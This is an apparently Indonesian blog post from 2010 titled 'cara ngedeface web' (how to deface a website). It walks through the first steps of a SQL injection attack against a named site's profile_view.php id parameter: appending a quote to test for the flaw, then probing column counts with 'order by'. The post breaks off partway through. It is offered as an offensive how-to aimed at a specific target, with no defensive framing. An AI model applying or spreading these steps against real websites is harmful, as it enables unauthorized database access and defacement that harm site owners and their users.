cara ngedeface web.........
langkah2 nya adalah:
1. Langkah pertama, Cari halaman pada website yang menampilkan sebuah informasi dari database…
http://www.catun.info/profile_view.php?id=113
2. Tes Vuln-nya dengan menambahkan tanda petik (’) pada akhir address…
http://www.catun.info/profile_view.php?id=113′
Browser akan menampilkan pesan error, itu tandanya website tersebut memiliki vuln SQL Injection…
3. Selanjutnya kita akan cari tau seberapa banyak colom dari tabel yang di tampilkan pada halaman tersebut, dengan cara menambahkan order by 1 — pada akhir brwser…
http://www.catun.info/profile_view.php?id=113%20order%20by%201%20– Jalan normal
ganti dengan angka 20
Senin, 05 April 2010
ngeDEFACE WEB..
Langganan:
Postingan (Atom)